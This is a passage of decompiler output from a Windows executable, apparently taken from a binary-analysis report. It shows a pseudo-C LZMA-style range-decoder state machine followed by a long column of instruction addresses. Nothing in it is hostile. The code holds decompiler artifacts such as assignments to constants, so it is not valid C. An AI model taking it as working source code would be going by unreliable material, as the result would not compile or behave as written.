												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}








                                                                                        0x00000000
                                                                                        0x00406767
                                                                                        0x00406767
                                                                                        0x0040676b
                                                                                        0x00406790
                                                                                        0x0040679a
                                                                                        0x00000000
                                                                                        0x0040676d
                                                                                        0x0040676d
                                                                                        0x00406770
                                                                                        0x00406774
                                                                                        0x00406777
                                                                                        0x0040677a
                                                                                        0x0040677e
                                                                                        0x0040677e
                                                                                        0x00406781
                                                                                        0x0040685b
                                                                                        0x0040685b
                                                                                        0x00406862
                                                                                        0x00406862
                                                                                        0x00406865
                                                                                        0x0040686c
                                                                                        0x00406899
                                                                                        0x0040689d
                                                                                        0x004068fd
                                                                                        0x00406900
                                                                                        0x00406905
                                                                                        0x00406906
                                                                                        0x00406908
                                                                                        0x0040690a
                                                                                        0x0040690d
                                                                                        0x00406819
                                                                                        0x00406819
                                                                                        0x00406819
                                                                                        0x00405fb5
                                                                                        0x00405fb5
                                                                                        0x00405fb5
                                                                                        0x00405fbe
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00405fc4
                                                                                        0x00000000
                                                                                        0x00405fcf
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00405fd8
                                                                                        0x00405fdb
                                                                                        0x00405fde
                                                                                        0x00405fe2
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00405fe8
                                                                                        0x00405feb
                                                                                        0x00405fed
                                                                                        0x00405fee
                                                                                        0x00405ff1
                                                                                        0x00405ff3
                                                                                        0x00405ff4
                                                                                        0x00405ff6
                                                                                        0x00405ff9
                                                                                        0x00405ffe
                                                                                        0x00406003
                                                                                        0x0040600c
                                                                                        0x0040601f
                                                                                        0x00406022
                                                                                        0x0040602e
                                                                                        0x00406056
                                                                                        0x00406058
                                                                                        0x00406066
                                                                                        0x00406066
                                                                                        0x0040606a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040605a
                                                                                        0x0040605a
                                                                                        0x0040605d
                                                                                        0x0040605e
                                                                                        0x0040605e
                                                                                        0x00000000
                                                                                        0x0040605a
                                                                                        0x00406034
                                                                                        0x00406039
                                                                                        0x00406039
                                                                                        0x00406042
                                                                                        0x0040604a
                                                                                        0x0040604d
                                                                                        0x00000000
                                                                                        0x00406053
                                                                                        0x00406053
                                                                                        0x00000000
                                                                                        0x00406053
                                                                                        0x00000000
                                                                                        0x00406070
                                                                                        0x00406070
                                                                                        0x00406074
                                                                                        0x00406920
                                                                                        0x00000000
                                                                                        0x00406920
                                                                                        0x0040607d
                                                                                        0x0040608d
                                                                                        0x00406090
                                                                                        0x00406093
                                                                                        0x00406093
                                                                                        0x00406093
                                                                                        0x00406096
                                                                                        0x0040609a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040609c
                                                                                        0x004060a2
                                                                                        0x004060cc
                                                                                        0x004060d2
                                                                                        0x004060d9
                                                                                        0x00000000
                                                                                        0x004060d9
                                                                                        0x004060a8
                                                                                        0x004060ab
                                                                                        0x004060b0
                                                                                        0x004060b0
                                                                                        0x004060bb
                                                                                        0x004060c3
                                                                                        0x004060c6
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040610b
                                                                                        0x00406111
                                                                                        0x00406114
                                                                                        0x00406121
                                                                                        0x00406129
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004060e0
                                                                                        0x004060e0
                                                                                        0x004060e4
                                                                                        0x0040692f
                                                                                        0x00000000
                                                                                        0x0040692f
                                                                                        0x004060f0
                                                                                        0x004060fb
                                                                                        0x004060fb
                                                                                        0x004060fb
                                                                                        0x004060fe
                                                                                        0x00406101
                                                                                        0x00406104
                                                                                        0x00406109
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004067a0
                                                                                        0x004067a0
                                                                                        0x004067a6
                                                                                        0x004067ac
                                                                                        0x004067b2
                                                                                        0x004067cc
                                                                                        0x004067cf
                                                                                        0x004067d5
                                                                                        0x004067e0
                                                                                        0x004067e0
                                                                                        0x004067e2
                                                                                        0x004067b4
                                                                                        0x004067b4
                                                                                        0x004067c3
                                                                                        0x004067c7
                                                                                        0x004067c7
                                                                                        0x004067ec
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004067ee
                                                                                        0x004067f2
                                                                                        0x004069a1
                                                                                        0x00000000
                                                                                        0x004069a1
                                                                                        0x004067fe
                                                                                        0x00406805
                                                                                        0x0040680d
                                                                                        0x00406810
                                                                                        0x00406813
                                                                                        0x00406813
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406131
                                                                                        0x00406133
                                                                                        0x00406136
                                                                                        0x004061a7
                                                                                        0x004061aa
                                                                                        0x004061ad
                                                                                        0x004061b4
                                                                                        0x004061be
                                                                                        0x00000000
                                                                                        0x004061be
                                                                                        0x00406138
                                                                                        0x0040613c
                                                                                        0x0040613f
                                                                                        0x00406141
                                                                                        0x00406144
                                                                                        0x00406147
                                                                                        0x00406149
                                                                                        0x0040614c
                                                                                        0x0040614e
                                                                                        0x00406153
                                                                                        0x00406156
                                                                                        0x00406159
                                                                                        0x0040615d
                                                                                        0x00406164
                                                                                        0x00406167
                                                                                        0x0040616e
                                                                                        0x00406172
                                                                                        0x0040617a
                                                                                        0x0040617a
                                                                                        0x0040617a
                                                                                        0x00406174
                                                                                        0x00406174
                                                                                        0x00406174
                                                                                        0x00406169
                                                                                        0x00406169
                                                                                        0x00406169
                                                                                        0x0040617e
                                                                                        0x00406181
                                                                                        0x0040619f
                                                                                        0x004061a1
                                                                                        0x00000000
                                                                                        0x00406183
                                                                                        0x00406183
                                                                                        0x00406186
                                                                                        0x00406189
                                                                                        0x0040618c
                                                                                        0x0040618e
                                                                                        0x0040618e
                                                                                        0x0040618e
                                                                                        0x00406191
                                                                                        0x00406194
                                                                                        0x00406196
                                                                                        0x00406197
                                                                                        0x0040619a
                                                                                        0x00000000
                                                                                        0x0040619a
                                                                                        0x00000000
                                                                                        0x004063d0
                                                                                        0x004063d4
                                                                                        0x004063f2
                                                                                        0x004063f5
                                                                                        0x004063fc
                                                                                        0x004063ff
                                                                                        0x00406402
                                                                                        0x00406405
                                                                                        0x00406408
                                                                                        0x0040640b
                                                                                        0x0040640d
                                                                                        0x00406414
                                                                                        0x00406415
                                                                                        0x00406417
                                                                                        0x0040641a
                                                                                        0x0040641d
                                                                                        0x00406420
                                                                                        0x00406420
                                                                                        0x00406425
                                                                                        0x00000000
                                                                                        0x00406425
                                                                                        0x004063d6
                                                                                        0x004063d9
                                                                                        0x004063dc
                                                                                        0x004063e6
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040643a
                                                                                        0x0040643e
                                                                                        0x00406461
                                                                                        0x00406464
                                                                                        0x00406467
                                                                                        0x00406471
                                                                                        0x00406440
                                                                                        0x00406440
                                                                                        0x00406443
                                                                                        0x00406446
                                                                                        0x00406449
                                                                                        0x00406456
                                                                                        0x00406459
                                                                                        0x00406459
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040647d
                                                                                        0x00406481
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406487
                                                                                        0x0040648b
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406491
                                                                                        0x00406493
                                                                                        0x00406497
                                                                                        0x00406497
                                                                                        0x0040649a
                                                                                        0x0040649e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004064ee
                                                                                        0x004064f2
                                                                                        0x004064f9
                                                                                        0x004064fc
                                                                                        0x004064ff
                                                                                        0x00406509
                                                                                        0x00000000
                                                                                        0x00406509
                                                                                        0x004064f4
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406515
                                                                                        0x00406519
                                                                                        0x00406520
                                                                                        0x00406523
                                                                                        0x00406526
                                                                                        0x0040651b
                                                                                        0x0040651b
                                                                                        0x0040651b
                                                                                        0x00406529
                                                                                        0x0040652c
                                                                                        0x0040652f
                                                                                        0x0040652f
                                                                                        0x00406532
                                                                                        0x00406535
                                                                                        0x00406538
                                                                                        0x00406538
                                                                                        0x0040653b
                                                                                        0x00406542
                                                                                        0x00406547
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004065d5
                                                                                        0x004065d5
                                                                                        0x004065d9
                                                                                        0x00406977
                                                                                        0x00000000
                                                                                        0x00406977
                                                                                        0x004065df
                                                                                        0x004065e2
                                                                                        0x004065e5
                                                                                        0x004065e9
                                                                                        0x004065ec
                                                                                        0x004065f2
                                                                                        0x004065f4
                                                                                        0x004065f4
                                                                                        0x004065f4
                                                                                        0x004065f7
                                                                                        0x004065fa
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004061ca
                                                                                        0x004061ca
                                                                                        0x004061ce
                                                                                        0x0040693b
                                                                                        0x00000000
                                                                                        0x0040693b
                                                                                        0x004061d4
                                                                                        0x004061d7
                                                                                        0x004061da
                                                                                        0x004061de
                                                                                        0x004061e1
                                                                                        0x004061e7
                                                                                        0x004061e9
                                                                                        0x004061e9
                                                                                        0x004061e9
                                                                                        0x004061ec
                                                                                        0x004061ef
                                                                                        0x004061ef
                                                                                        0x004061f2
                                                                                        0x004061f5
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004061fb
                                                                                        0x00406201
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406207
                                                                                        0x00406207
                                                                                        0x0040620b
                                                                                        0x0040620e
                                                                                        0x00406211
                                                                                        0x00406214
                                                                                        0x00406217
                                                                                        0x00406218
                                                                                        0x0040621b
                                                                                        0x0040621d
                                                                                        0x00406223
                                                                                        0x00406226
                                                                                        0x00406229
                                                                                        0x0040622c
                                                                                        0x0040622f
                                                                                        0x00406232
                                                                                        0x00406235
                                                                                        0x00406251
                                                                                        0x00406254
                                                                                        0x00406257
                                                                                        0x0040625a
                                                                                        0x00406261
                                                                                        0x00406265
                                                                                        0x00406267
                                                                                        0x0040626b
                                                                                        0x00406237
                                                                                        0x00406237
                                                                                        0x0040623b
                                                                                        0x00406243
                                                                                        0x00406248
                                                                                        0x0040624a
                                                                                        0x0040624c
                                                                                        0x0040624c
                                                                                        0x0040626e
                                                                                        0x00406275
                                                                                        0x00406278
                                                                                        0x00000000
                                                                                        0x0040627e
                                                                                        0x00000000
                                                                                        0x0040627e
                                                                                        0x00000000
                                                                                        0x00406283
                                                                                        0x00406283
                                                                                        0x00406287
                                                                                        0x00406947
                                                                                        0x00000000
                                                                                        0x00406947
                                                                                        0x0040628d
                                                                                        0x00406290
                                                                                        0x00406293
                                                                                        0x00406297
                                                                                        0x0040629a
                                                                                        0x004062a0
                                                                                        0x004062a2
                                                                                        0x004062a2
                                                                                        0x004062a2
                                                                                        0x004062a5
                                                                                        0x004062a8
                                                                                        0x004062a8
                                                                                        0x004062a8
                                                                                        0x004062ae
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004062b0
                                                                                        0x004062b3
                                                                                        0x004062b6
                                                                                        0x004062b9
                                                                                        0x004062bc
                                                                                        0x004062bf
                                                                                        0x004062c2
                                                                                        0x004062c5
                                                                                        0x004062c8
                                                                                        0x004062cb
                                                                                        0x004062ce
                                                                                        0x004062e6
                                                                                        0x004062e9
                                                                                        0x004062ec
                                                                                        0x004062ef
                                                                                        0x004062ef
                                                                                        0x004062f2
                                                                                        0x004062f6
                                                                                        0x004062f8
                                                                                        0x004062d0
                                                                                        0x004062d0
                                                                                        0x004062d8
                                                                                        0x004062dd
                                                                                        0x004062df
                                                                                        0x004062e1
                                                                                        0x004062e1
                                                                                        0x004062fb
                                                                                        0x00406302
                                                                                        0x00406305
                                                                                        0x00000000
                                                                                        0x00406307
                                                                                        0x00000000
                                                                                        0x00406307
                                                                                        0x00406305
                                                                                        0x0040630c
                                                                                        0x0040630c
                                                                                        0x0040630c
                                                                                        0x0040630c
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406347
                                                                                        0x00406347
                                                                                        0x0040634b
                                                                                        0x00406953
                                                                                        0x00000000
                                                                                        0x00406953
                                                                                        0x00406351
                                                                                        0x00406354
                                                                                        0x00406357
                                                                                        0x0040635b
                                                                                        0x0040635e
                                                                                        0x00406364
                                                                                        0x00406366
                                                                                        0x00406366
                                                                                        0x00406366
                                                                                        0x00406369
                                                                                        0x0040636c
                                                                                        0x0040636c
                                                                                        0x00406372
                                                                                        0x00406310
                                                                                        0x00406310
                                                                                        0x00406313
                                                                                        0x00000000
                                                                                        0x00406313
                                                                                        0x00406374
                                                                                        0x00406374
                                                                                        0x00406377
                                                                                        0x0040637a
                                                                                        0x0040637d
                                                                                        0x00406380
                                                                                        0x00406383
                                                                                        0x00406386
                                                                                        0x00406389
                                                                                        0x0040638c
                                                                                        0x0040638f
                                                                                        0x00406392
                                                                                        0x004063aa
                                                                                        0x004063ad
                                                                                        0x004063b0
                                                                                        0x004063b3
                                                                                        0x004063b3
                                                                                        0x004063b6
                                                                                        0x004063ba
                                                                                        0x004063bc
                                                                                        0x00406394
                                                                                        0x00406394
                                                                                        0x0040639c
                                                                                        0x004063a1
                                                                                        0x004063a3
                                                                                        0x004063a5
                                                                                        0x004063a5
                                                                                        0x004063bf
                                                                                        0x004063c6
                                                                                        0x004063c9
                                                                                        0x00000000
                                                                                        0x004063cb
